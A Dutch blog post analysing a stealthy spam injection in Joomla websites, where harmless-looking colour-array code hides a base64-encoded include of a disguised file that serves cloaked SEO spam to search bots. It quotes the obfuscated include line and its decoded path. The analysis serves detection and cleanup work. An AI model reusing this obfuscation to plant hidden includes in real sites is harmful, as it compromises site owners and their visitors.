2 minutes reading time (326 words)

Geniepige spam injecties in Joomla websites

Geniepige spam injecties in Joomla websites

Malware schrijvers kunnen echt geniaal zijn als het gaat om het verdoezelen van hun code. En ze moeten ook wel vanwege de anti malware extensies binnen veel websites die bij een geringe wijziging al een waarschuwing geven waardoor de malware makers het malware effect missen.

Als we het hebben over vertroebeling dan is het eerste wat we bedenken de base64 encoding, gzinflate of een andere ingebouwde functie die ervoor zorgt dat de code onleesbaar wordt voor de gemiddelde gebruiker, maar ze vallen snel op voor de gebruiker met een getraind oog.

Met deze wetenschap wordt de malwarecode steeds verder verstopt en onherkenbaar gemaakt zodat de exploit langer duurt en moeilijker is op te lossen.

Neem de onderstaande code eens als voorbeeld:

Joomla-spam-voorbeeld

Op het eerste gezicht lijkt het een goede code te zijn, gewoon wat kleur arrays die te maken hebben met Joomla.

Maar die functie init_colors ($colors) dient hier voor het omzetten van deze arrays in een string. Daarvoor zie je de aanroep preg_replace welke al die arrays omzet in:

return include(base64_decode("L3dlYi9odGRvY3Mvd3d3LmZvcm1lci5iaXovaG9tZS9tZWRpYS9rMi9hc3NldHMvaW1hZ2VzL2VsZmluZGVyLy5pY29ucy8uJTZhOSUlOTJkJSU1NTIlJTlmNCUlNTlhJSU0NGYlJWVlNSUlOGM3JQ=="));;


Welke decodeerd naar:

 

/web/htdocs/www.attackedsite.dom/home/media/k2/assets/images/elfinder/.icons/.%6a9%%92d%%552%%9f4%%59a%%44f%%ee5%%8c7%


Deze bestandsnaam is niet gecodeerd, maar wordt opgeslagen met deze vreemde naam.

Wanneer je dit vreemde bestand opent vindt je een ingewikkelde spam tool, hier is een klein deel:

Joomla-complex-spam-script

Het meest interessante deel is dat deze spamtool alle connecties naar de website controleert en bekijkt of het een persoon of bijvoorbeeld een zoekbot is. Op basis van die gegevens wordt de spamcode wel of niet getoond; hierdoor wordt de SEO aanval geperfectioneert waardoor er een maximaal rendement wordt behaald door de hacker.

Hieronder kan je zien hoe een scan eruit ziet:

Joomla-spam-scan-output

Iets anders is dat de code speciaal op maat gemaakt is voor de website met gebruikmaking van de volledige paden in plaats van relatieve paden zoals gewoonlijk het geval is. Dit betekent dat het gebruiken van scripts om base64 gecodeerde strings te vinden niet zo effectief zijn als we meestal denken, het vinden van spam wordt steeds ingewikkelder.

Joomla 3.2.0 vrijgegeven
Test eenvoudig Joomla 3 patches

Gerelateerde berichten

 

Reacties

Er zijn nog geen reacties gegeven. Wees de eerste die een reactie geeft
Gast
vrijdag 15 november 2019

Captcha afbeelding